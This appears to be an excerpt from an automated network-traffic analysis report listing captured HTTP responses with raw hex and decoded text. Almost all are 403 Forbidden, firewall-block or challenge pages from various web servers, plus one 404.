                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:32 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: ymevDYD3/QdnIt5jhData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:32 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:32 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:54:33 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:33 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:54:33 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:54:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKORcXcHZ0uSnwqMobs33LWWC6jCVQoIMGxn%2FhkRJxtpRfQRCDAdCLO6vl3JP1Y71MxJWQWb1bl%2F5deA3NPDa8vMa%2BBfFo3%2BrD%2BuEdFJDFEmHs7nBXvj5aCSbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f5bcfcc914d-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 33 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e Data Ascii: 1348<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" con
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:34 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:35 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
